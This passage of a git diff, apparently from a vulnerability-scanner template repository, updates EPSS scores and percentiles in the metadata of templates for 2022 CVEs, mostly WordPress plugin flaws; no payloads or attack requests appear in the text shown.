CVE-2022-0658 cwe-id: CWE-89 epss-score: 0.03032 - epss-percentile: 0.89856 + epss-percentile: 0.8986 cpe: cpe:2.3:a:wielebenwir:commonsbooking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index f4005d694e..e1d7b19403 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0660 cwe-id: CWE-209 epss-score: 0.00719 - epss-percentile: 0.78454 + epss-percentile: 0.78465 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index e4735c00ca..70f67ac995 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0678 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45519 + epss-percentile: 0.45534 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index feb87239fb..8501ec2909 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0679 cwe-id: CWE-22 epss-score: 0.02375 - epss-percentile: 0.8866 + epss-percentile: 0.88665 cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 5e2793ada4..0829e1aaa1 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0692 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 1f2734e968..77344aba68 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0693 cwe-id: CWE-89 epss-score: 0.01519 - epss-percentile: 0.85588 + epss-percentile: 0.85594 cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index cdabdb704e..2fe6234163 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0735 cwe-id: CWE-863 epss-score: 0.02762 - epss-percentile: 0.8945 + epss-percentile: 0.89456 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 5714b5a7f3..1ba7c4139d 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0747 cwe-id: CWE-89 epss-score: 0.01617 - epss-percentile: 0.86073 + epss-percentile: 0.86077 cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 7c708d7038..8b316674a1 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0760 cwe-id: CWE-89 epss-score: 0.01617 - epss-percentile: 0.86073 + epss-percentile: 0.86077 cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index dd0394e602..d4ffbdeab6 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0769 cwe-id: CWE-89 epss-score: 0.01519 - epss-percentile: 0.85588 + epss-percentile: 0.85594 cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 6f76f68fdb..d7e0c25874 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0773 cwe-id: CWE-89 epss-score: 0.02409 - epss-percentile: 0.88737 + epss-percentile: 0.88743 cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index b0ba9f6fd2..6dc07be188 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0776 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* metadata: vendor: revealjs diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 6e9acd24fb..2dc46bf3ae 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0781 cwe-id: CWE-89 epss-score: 0.00974 - epss-percentile: 0.81698 + epss-percentile: 0.81709 cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index c838fbbcb6..d16fb56feb 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0784 cwe-id: CWE-89 epss-score: 0.03032 - epss-percentile: 0.89856 + epss-percentile: 0.8986 cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index e0c403b6f0..a2c7ac5bc6 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0785 cwe-id: CWE-89 epss-score: 0.03202 - epss-percentile: 0.90102 + epss-percentile: 0.90106 cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index c8a4f7d800..317b47057c 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0786 cwe-id: CWE-89 epss-score: 0.02077 - epss-percentile: 0.87848 + epss-percentile: 0.87854 cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index add3c134aa..b51aaa194c 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0788 cwe-id: CWE-89 epss-score: 0.02077 - epss-percentile: 0.87848 + epss-percentile: 0.87854 cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index 5a0a20c407..0e21173d78 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0814 cwe-id: CWE-89 epss-score: 0.02409 - epss-percentile: 0.88737 + epss-percentile: 0.88743 cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index d76687930a..0deae4c904 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0817 cwe-id: CWE-89 epss-score: 0.02409 - epss-percentile: 0.88737 + epss-percentile: 0.88743 cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index 3e4565df20..128ba19336 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0824 cwe-id: CWE-284,CWE-863 epss-score: 0.9725 - epss-percentile: 0.99784 + epss-percentile: 0.99785 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 376bb8725f..b2afe10bd9 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0826 cwe-id: CWE-89 epss-score: 0.02409 - epss-percentile: 0.88737 + epss-percentile: 0.88743 cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index c40c0424af..f00fe4adc2 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0827 cwe-id: CWE-89 epss-score: 0.02077 - epss-percentile: 0.87848 + epss-percentile: 0.87854 cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 150bb39e68..a83643d9df 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0846 cwe-id: CWE-89 epss-score: 0.03032 - epss-percentile: 0.89856 + epss-percentile: 0.8986 cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index b240cdee8d..aaf0b87e1a 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0864 cwe-id: CWE-79 epss-score: 0.00242 - epss-percentile: 0.61947 + epss-percentile: 0.61975 cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index c903874441..1413c196da 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0867 cwe-id: CWE-89 epss-score: 0.06258 - epss-percentile: 0.9281 + epss-percentile: 0.92815 cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 61a084613e..c0aa52a01d 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0869 cwe-id: CWE-601 epss-score: 0.00115 - epss-percentile: 0.44908 + epss-percentile: 0.44929 cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index e5741c6fae..d84725ff46 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0870 cwe-id: CWE-918 epss-score: 0.00197 - epss-percentile: 0.57375 + epss-percentile: 0.57403 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 037bd768ca..031af03a05 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0885 cwe-id: CWE-862 epss-score: 0.17254 - epss-percentile: 0.95516 + epss-percentile: 0.95518 cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index 47dccf6758..03cf6112a1 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2022-0899 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45838 + epss-percentile: 0.45853 cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 50f0531749..86788f17b1 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0928 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50057 + epss-percentile: 0.50079 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index f0fb4cfa11..f44a708900 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0948 cwe-id: CWE-89 epss-score: 0.0459 - epss-percentile: 0.91605 + epss-percentile: 0.91615 cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index e16994c34f..0f5df986bc 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0949 cwe-id: CWE-89 - epss-score: 0.03202 - epss-percentile: 0.90102 + epss-score: 0.03032 + epss-percentile: 0.8986 cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index cdb4a1310e..11fffa65a6 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0952 cwe-id: CWE-352 epss-score: 0.03653 - epss-percentile: 0.90652 + epss-percentile: 0.90659 cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index bc750a7351..67c866ac0d 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0954 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50057 + epss-percentile: 0.50079 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index d59e8ec6fa..8ceb44032d 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0963 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50057 + epss-percentile: 0.50079 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 3d61d80d43..538feb67e9 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0968 cwe-id: CWE-190 epss-score: 0.00076 - epss-percentile: 0.3148 + epss-percentile: 0.31483 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index 1383338e57..fd4c1321e5 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1007 cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.44893 + epss-score: 0.001 + epss-percentile: 0.41014 cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 0f43da7289..d9301e00c8 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1013 cwe-id: CWE-89 - epss-score: 0.00942 - epss-percentile: 0.81384 + epss-score: 0.01029 + epss-percentile: 0.82213 cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index 02816cb145..e7a58200ee 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-1020 cwe-id: CWE-352 epss-score: 0.01272 - epss-percentile: 0.84183 + epss-percentile: 0.84191 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index f3f88fe12c..117dd687c2 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2022-1054 cwe-id: CWE-862 epss-score: 0.00335 - epss-percentile: 0.68055 + epss-percentile: 0.68081 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 646d4674dd..b742a6d867 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1057 cwe-id: CWE-89 epss-score: 0.02077 - epss-percentile: 0.87848 + epss-percentile: 0.87854 cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index cc578285d6..a405fdc9e1 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1058 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 54ae3d8ef6..c9ec76925d 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1119 cwe-id: CWE-22 epss-score: 0.51252 - epss-percentile: 0.97176 + epss-percentile: 0.97179 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index a524affae3..11e7e2bace 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1162 cwe-id: CWE-798 epss-score: 0.17325 - epss-percentile: 0.9552 + epss-percentile: 0.95522 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml index a9074afe5e..3774443c74 100644 --- a/http/cves/2022/CVE-2022-1168.yaml +++ b/http/cves/2022/CVE-2022-1168.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1168 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 512ae39f6b..09b1595f57 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1221 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45838 + epss-percentile: 0.45853 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index fb173c33a9..449c2f5b6f 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1386 cwe-id: CWE-918 epss-score: 0.21967 - epss-percentile: 0.95922 + epss-percentile: 0.95925 cpe: cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index 97c894f0e0..15e3ca4d2a 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1388 cwe-id: CWE-306 - epss-score: 0.97155 - epss-percentile: 0.99729 + epss-score: 0.9733 + epss-percentile: 0.99846 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 288bba1aaa..664e334afd 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1391 cwe-id: CWE-22 epss-score: 0.02165 - epss-percentile: 0.88119 + epss-percentile: 0.88124 cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index daf1967e61..943122b4d6 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1392 cwe-id: CWE-22 epss-score: 0.01296 - epss-percentile: 0.84378 + epss-percentile: 0.84386 cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index 808efc2d7a..927eb08072 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1398 cwe-id: CWE-918 epss-score: 0.005 - epss-percentile: 0.73679 + epss-percentile: 0.73705 cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index cac4861b9f..8397142171 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1439 cwe-id: CWE-79 epss-score: 0.00115 - epss-percentile: 0.44893 + epss-percentile: 0.44915 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index 71a37bb301..40ad689937 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1442 cwe-id: CWE-862 epss-score: 0.06478 - epss-percentile: 0.92937 + epss-percentile: 0.92941 cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index 505c5688a8..3f101ffacf 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1574 cwe-id: CWE-352 epss-score: 0.02682 - epss-percentile: 0.89305 + epss-percentile: 0.89312 cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index c51cc001c7..900153c58b 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1595 cwe-id: CWE-200 epss-score: 0.0018 - epss-percentile: 0.55033 + epss-percentile: 0.55058 cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 6dc3bf68e4..7e26cdbd05 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1597 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.62871 + epss-percentile: 0.62899 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index 806145e269..b7ef569a87 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1598 cwe-id: CWE-306 epss-score: 0.01969 - epss-percentile: 0.8746 + epss-percentile: 0.87467 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 5b151cea9d..e0418acef0 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1713 cwe-id: CWE-918 epss-score: 0.01031 - epss-percentile: 0.82219 + epss-percentile: 0.82228 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git 